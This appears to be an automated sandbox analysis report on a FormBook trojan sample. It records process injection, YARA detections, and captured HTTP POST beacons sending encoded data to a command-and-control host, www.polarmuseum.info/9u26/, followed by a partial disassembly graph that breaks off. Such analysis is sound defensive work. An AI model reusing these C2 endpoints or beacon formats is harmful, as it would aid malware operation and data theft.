                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                            Nov 5, 2024 15:24:50.688812971 CET212INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
                                                                            Nov 5, 2024 15:24:50.688824892 CET1236INData Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e
                                                                            Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
                                                                            Nov 5, 2024 15:24:50.688972950 CET212INData Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63
                                                                            Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn a
                                                                            Nov 5, 2024 15:24:50.690660000 CET274INData Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                            Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.45574813.248.169.48804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:55.883507013 CET808OUTPOST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 70 53 55 57 72 33 57 7a 39 4a 58 6b 73 4b 4a 6d 39 57 62 74 37 37 41 30 2f 46 32 54 6a 37 4f 39 72 78 78 57 46 59 64 39 64 4e 79 73 71 2f 72 34 69 6a 4e 6c 79 63 50 6a 31 6f 75 34 4d 69 37 55 52 55 30 73 4c 59 2f 45 41 61 35 47 68 6d 66 70 6a 2b 79 4d 45 47 73 49 41 64 58 48 71 73 46 50 34 64 53 55 47 4b 69 2f 59 6a 2b 38 64 7a 4a 50 41 33 6f 31 70 39 47 30 63 73 69 6d 5a 64 73 2b 79 52 56 6b 62 65 37 4f 30 56 38 2f 77 6c 2b 4a 52 66 71 36 52 70 79 74 52 6a 4c 67 52 52 76 68 49 41 2f 7a 2f 2b 67 4a 55 45 30 6f 47 2b 6e 36 37 65 54 6a 62 41 3d 3d
                                                                            Data Ascii: zhl=4IbmWTjBIea5pSUWr3Wz9JXksKJm9Wbt77A0/F2Tj7O9rxxWFYd9dNysq/r4ijNlycPj1ou4Mi7URU0sLY/EAa5Ghmfpj+yMEGsIAdXHqsFP4dSUGKi/Yj+8dzJPA3o1p9G0csimZds+yRVkbe7O0V8/wl+JRfq6RpytRjLgRRvhIA/z/+gJUE0oG+n67eTjbA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.45574913.248.169.48804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:58.420857906 CET828OUTPOST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 72 79 6b 57 6f 51 36 7a 36 70 58 72 6a 71 4a 6d 32 32 62 68 37 37 63 30 2f 41 48 57 69 49 36 39 72 55 64 57 58 63 78 39 65 4e 79 73 74 50 72 39 6d 6a 4d 49 79 63 79 65 31 70 53 34 4d 69 76 55 52 57 38 73 4c 50 44 48 41 4b 35 41 70 47 66 72 38 75 79 4d 45 47 73 49 41 64 54 70 71 6f 70 50 34 74 43 55 47 75 4f 77 47 54 2b 39 61 7a 4a 50 45 33 70 79 70 39 48 68 63 74 75 4d 5a 66 55 2b 79 51 6c 6b 61 4d 44 4a 36 56 38 6d 30 6c 2f 71 52 4f 48 43 58 4c 62 6c 51 43 32 45 54 56 7a 69 45 6d 75 70 75 50 42 65 47 45 51 62 62 35 75 4f 32 64 75 71 41 4c 6f 4f 6d 74 4f 59 4f 56 47 54 78 38 57 52 66 59 69 38 34 4d 4d 3d
                                                                            Data Ascii: zhl=4IbmWTjBIea5rykWoQ6z6pXrjqJm22bh77c0/AHWiI69rUdWXcx9eNystPr9mjMIycye1pS4MivURW8sLPDHAK5ApGfr8uyMEGsIAdTpqopP4tCUGuOwGT+9azJPE3pyp9HhctuMZfU+yQlkaMDJ6V8m0l/qROHCXLblQC2ETVziEmupuPBeGEQbb5uO2duqALoOmtOYOVGTx8WRfYi84MM=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.45575013.248.169.48804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:25:00.973829985 CET10910OUTPOST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 72 79 6b 57 6f 51 36 7a 36 70 58 72 6a 71 4a 6d 32 32 62 68 37 37 63 30 2f 41 48 57 69 4a 43 39 72 43 4a 57 55 37 6c 39 66 4e 79 73 75 50 72 38 6d 6a 4d 77 79 63 72 5a 31 70 65 6f 4d 67 58 55 52 31 6b 73 61 72 58 48 54 71 35 41 72 47 66 71 6a 2b 79 6a 45 47 38 45 41 64 44 70 71 6f 70 50 34 72 75 55 50 61 69 77 45 54 2b 38 64 7a 4a 54 41 33 6f 56 70 39 65 61 63 74 71 32 5a 76 30 2b 7a 77 31 6b 63 2f 37 4a 79 56 38 6b 34 46 2f 4d 52 4f 4c 64 58 4c 48 44 51 43 54 68 54 53 62 69 56 78 44 45 71 38 6c 6f 54 31 55 38 41 6f 53 5a 2f 66 4b 2f 49 37 67 6f 74 76 6d 38 65 57 4b 6b 33 65 50 2f 4d 37 6d 6e 69 72 63 79 62 35 4a 54 77 32 61 38 58 58 74 39 2b 36 6a 5a 58 4b 73 55 62 31 39 67 33 67 45 55 6b 72 31 38 4b 6b 35 71 2f 2b 78 6d 65 53 33 51 56 34 62 2b 58 52 33 56 56 32 61 56 68 39 47 49 79 34 36 52 44 44 30 52 75 6d 49 66 50 32 59 4c 64 44 6e 43 44 7a 37 57 6a 31 61 76 63 73 58 72 76 30 33 35 41 39 48 2b 38 76 70 4d 4c 55 4e 78 50 37 33 6f 78 5a 68 69 50 6b [TRUNCATED]
                                                                            Data Ascii: zhl=4IbmWTjBIea5rykWoQ6z6pXrjqJm22bh77c0/AHWiJC9rCJWU7l9fNysuPr8mjMwycrZ1peoMgXUR1ksarXHTq5ArGfqj+yjEG8EAdDpqopP4ruUPaiwET+8dzJTA3oVp9eactq2Zv0+zw1kc/7JyV8k4F/MROLdXLHDQCThTSbiVxDEq8loT1U8AoSZ/fK/I7gotvm8eWKk3eP/M7mnircyb5JTw2a8XXt9+6jZXKsUb19g3gEUkr18Kk5q/+xmeS3QV4b+XR3VV2aVh9GIy46RDD0RumIfP2YLdDnCDz7Wj1avcsXrv035A9H+8vpMLUNxP73oxZhiPkIQuhc20MDt0VNIX0M7ad0fVp1SRuCYFX00BCsONCZvIn6hckcUzVY/mVMpem7bBgZ9t/aHDKHqVlaZTCumx/Ac6/wK0H21NyhQyhQNQ9lgyORytsYh1pwHXKrkSGVw01vApxjYeMmke/JYuwmtv0mnje/GLAMi//GmBF/jwA97ZQZ+dZh7XCNegcqHnsJfvI9XiCIs1EbisGVmbnjHZUlneRy6HORAvzCWaguKIvC+zLflEw1hcShSIc8xpZKp0Mml6rFG3eRTzLZc7UqeuSMCQ08yDSdHq3+4GYSm7GeakI+2gL1nbatxlS7A6FiBJMZ6cWXaxUB1t9mFm7OGOfnbVr6AhQ3+GmFn+ntYSakyueMdlYkH3xpQYd8Kvqc6aiFwnpcI3A5euGFq3c/jXJfc2BDKjOGfX0fsYsvK8rebUEoh07xemLE1GFPdDhFzY5QY4u0DT5iLC1deFQqq8NAEhIlq5Q14V2IIWIyTd0rCRNmfDFMUIl5yNs5y9ULdpw4OUUzBV1mo1MT1y8zc33nsFC7yXtGj67mrSWqNJnZhBa/JbVff1Afg5gCwTiDNxmWYq5xSfDWXrpTJRV6h9ZwXodKuEJQ83szEOGOC69+4jncr2la1WGOzYyyfLd49D/e/nQ1amcULADx/JX+0LQ/zbT48rmj3ojsT [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.45575113.248.169.48804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:25:03.513168097 CET541OUTGET /9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.polarmuseum.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:25:04.165735006 CET396INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 05 Nov 2024 14:25:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 256
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 68 6c 3d 31 4b 7a 47 56 6d 76 4f 4b 59 6d 43 6f 31 77 70 75 57 2b 72 38 4e 50 38 6c 2f 56 37 2f 53 44 32 71 66 4d 33 36 6e 4b 4a 6a 49 57 77 35 79 52 7a 4f 70 6c 31 56 35 79 4d 6c 4b 62 2b 6f 42 30 5a 6b 4a 54 72 37 72 32 49 4b 33 58 74 62 57 63 4b 65 36 2f 50 45 61 6c 44 6b 6e 33 71 77 66 43 6d 44 6e 55 6d 50 63 66 44 6e 64 4e 50 7a 4d 36 53 45 59 72 5a 62 52 34 3d 26 58 38 52 78 31 3d 7a 6e 68 68 49 62 42 38 6e 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN"}</script></head></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:22:01
                                                                            Start date:05/11/2024
                                                                            Path:C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\r6lOHDg9N9.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'339'905 bytes
                                                                            MD5 hash:9F65C6E2192CC6757C1E7BE556A4BC9A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:09:22:03
                                                                            Start date:05/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\r6lOHDg9N9.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:09:22:33
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe"
                                                                            Imagebase:0xb10000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:09:22:35
                                                                            Start date:05/11/2024
                                                                            Path:C:\Windows\SysWOW64\write.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                            Imagebase:0x2a0000
                                                                            File size:10'240 bytes
                                                                            MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:7
                                                                            Start time:09:22:48
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe"
                                                                            Imagebase:0xb10000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:09:23:00
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:3.1%
                                                                              Dynamic/Decrypted Code Coverage:2.4%
                                                                              Signature Coverage:3.4%
                                                                              Total number of Nodes:1599
                                                                              Total number of Limit Nodes:38
                                                                              execution_graph 83110 4161c2 83111 4161d3 83110->83111 83145 41aa31 HeapCreate 83111->83145 83114 416212 83147 416e29 GetModuleHandleW 83114->83147 83118 416223 __RTC_Initialize 83181 41b669 83118->83181 83121 416231 83122 41623d GetCommandLineW 83121->83122 83250 4117af 67 API calls 3 library calls 83121->83250 83196 42235f GetEnvironmentStringsW 83122->83196 83125 41623c 83125->83122 83126 41624c 83202 4222b1 GetModuleFileNameW 83126->83202 83128 416256 83129 416261 83128->83129 83251 4117af 67 API calls 3 library calls 83128->83251 83206 422082 83129->83206 83133 416272 83219 41186e 83133->83219 83136 416279 83138 416284 __wwincmdln 83136->83138 83253 4117af 67 API calls 3 library calls 83136->83253 83225 40d7f0 83138->83225 83141 4162b3 83255 411a4b 67 API calls _doexit 83141->83255 83144 4162b8 _fseek 83146 416206 83145->83146 83146->83114 83248 41616a 67 API calls 3 library calls 83146->83248 83148 416e44 83147->83148 83149 416e3d 83147->83149 83151 416fac 83148->83151 83152 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 83148->83152 83256 41177f Sleep GetModuleHandleW 83149->83256 83286 416ad5 70 API calls 2 library calls 83151->83286 83154 416e97 TlsAlloc 83152->83154 83153 416e43 83153->83148 83157 416218 83154->83157 83158 416ee5 TlsSetValue 83154->83158 83157->83118 83249 41616a 67 API calls 3 library calls 83157->83249 83158->83157 83159 416ef6 83158->83159 83257 411a69 6 API calls 4 library calls 83159->83257 83161 416efb 83258 41696e TlsGetValue 83161->83258 83164 41696e __encode_pointer 6 API calls 83165 416f16 83164->83165 83166 41696e __encode_pointer 6 API calls 83165->83166 83167 416f26 83166->83167 83168 41696e __encode_pointer 6 API calls 83167->83168 83169 416f36 83168->83169 83268 41828b InitializeCriticalSectionAndSpinCount ___lock_fhandle 83169->83268 83171 416f43 83171->83151 83269 4169e9 TlsGetValue 83171->83269 83176 4169e9 __decode_pointer 6 API calls 83177 416f8a 83176->83177 83177->83151 83178 416f91 83177->83178 83285 416b12 67 API calls 5 library calls 83178->83285 83180 416f99 GetCurrentThreadId 83180->83157 83399 41718c 83181->83399 83183 41b675 GetStartupInfoA 83184 416ffb __calloc_crt 67 API calls 83183->83184 83185 41b696 83184->83185 83186 41b8b4 _fseek 83185->83186 83188 416ffb __calloc_crt 67 API calls 83185->83188 83191 41b7fb 83185->83191 83192 41b77e 83185->83192 83186->83121 83187 41b831 GetStdHandle 83187->83191 83188->83185 83189 41b896 SetHandleCount 83189->83186 83190 41b843 GetFileType 83190->83191 83191->83186 83191->83187 83191->83189 83191->83190 83401 4189e6 InitializeCriticalSectionAndSpinCount _fseek 83191->83401 83192->83186 83192->83191 83193 41b7a7 GetFileType 83192->83193 83400 4189e6 InitializeCriticalSectionAndSpinCount _fseek 83192->83400 83193->83192 83197 422370 83196->83197 83198 422374 83196->83198 83197->83126 83199 416fb6 __malloc_crt 67 API calls 83198->83199 83200 422395 _memcpy_s 83199->83200 83201 42239c FreeEnvironmentStringsW 83200->83201 83201->83126 83203 4222e6 _wparse_cmdline 83202->83203 83204 416fb6 __malloc_crt 67 API calls 83203->83204 83205 422329 _wparse_cmdline 83203->83205 83204->83205 83205->83128 83207 42209a _wcslen 83206->83207 83211 416267 83206->83211 83208 416ffb __calloc_crt 67 API calls 83207->83208 83214 4220be _wcslen 83208->83214 83209 422123 83210 413a88 __getptd_noexit 67 API calls 83209->83210 83210->83211 83211->83133 83252 4117af 67 API calls 3 library calls 83211->83252 83212 416ffb __calloc_crt 67 API calls 83212->83214 83213 422149 83215 413a88 __getptd_noexit 67 API calls 83213->83215 83214->83209 83214->83211 83214->83212 83214->83213 83217 422108 83214->83217 83402 426349 67 API calls _memcpy_s 83214->83402 83215->83211 83217->83214 83403 417d93 10 API calls 3 library calls 83217->83403 83220 41187c __IsNonwritableInCurrentImage 83219->83220 83404 418486 83220->83404 83222 41189a __initterm_e 83224 4118b9 __IsNonwritableInCurrentImage __initterm 83222->83224 83408 411421 83222->83408 83224->83136 83226 431bcb 83225->83226 83227 40d80c 83225->83227 83452 4092c0 83227->83452 83229 40d847 83456 40eb50 83229->83456 83232 40d877 83459 411ac6 67 API calls 4 library calls 83232->83459 83235 40d888 83460 411b24 67 API calls _memcpy_s 83235->83460 83237 40d891 83461 40f370 SystemParametersInfoW SystemParametersInfoW 83237->83461 83239 40d89f 83462 40d6d0 GetCurrentDirectoryW 83239->83462 83241 40d8a7 SystemParametersInfoW 83242 40d8d4 83241->83242 83243 40d8cd FreeLibrary 83241->83243 83244 4092c0 VariantClear 83242->83244 83243->83242 83245 40d8dd 83244->83245 83246 4092c0 VariantClear 83245->83246 83247 40d8e6 83246->83247 83247->83141 83254 411a1f 67 API calls _doexit 83247->83254 83248->83114 83249->83118 83250->83125 83251->83129 83252->83133 83253->83138 83254->83141 83255->83144 83256->83153 83257->83161 83259 4169a7 GetModuleHandleW 83258->83259 83260 416986 83258->83260 83262 4169c2 GetProcAddress 83259->83262 83263 4169b7 83259->83263 83260->83259 83261 416990 TlsGetValue 83260->83261 83265 41699b 83261->83265 83267 41699f 83262->83267 83287 41177f Sleep GetModuleHandleW 83263->83287 83265->83259 83265->83267 83266 4169bd 83266->83262 83266->83267 83267->83164 83268->83171 83270 416a01 83269->83270 83271 416a22 GetModuleHandleW 83269->83271 83270->83271 83272 416a0b TlsGetValue 83270->83272 83273 416a32 83271->83273 83274 416a3d GetProcAddress 83271->83274 83277 416a16 83272->83277 83288 41177f Sleep GetModuleHandleW 83273->83288 83276 416a1a 83274->83276 83276->83151 83279 416ffb 83276->83279 83277->83271 83277->83276 83278 416a38 83278->83274 83278->83276 83282 417004 83279->83282 83281 416f70 83281->83151 83281->83176 83282->83281 83283 417022 Sleep 83282->83283 83289 422452 83282->83289 83284 417037 83283->83284 83284->83281 83284->83282 83285->83180 83286->83157 83287->83266 83288->83278 83290 42245e _fseek 83289->83290 83291 422476 83290->83291 83299 422495 _memset 83290->83299 83302 417f23 67 API calls __getptd_noexit 83291->83302 83293 42247b 83303 417ebb 6 API calls 2 library calls 83293->83303 83295 422507 HeapAlloc 83295->83299 83296 42248b _fseek 83296->83282 83299->83295 83299->83296 83304 418407 83299->83304 83311 41a74c 5 API calls 2 library calls 83299->83311 83312 42254e LeaveCriticalSection _doexit 83299->83312 83313 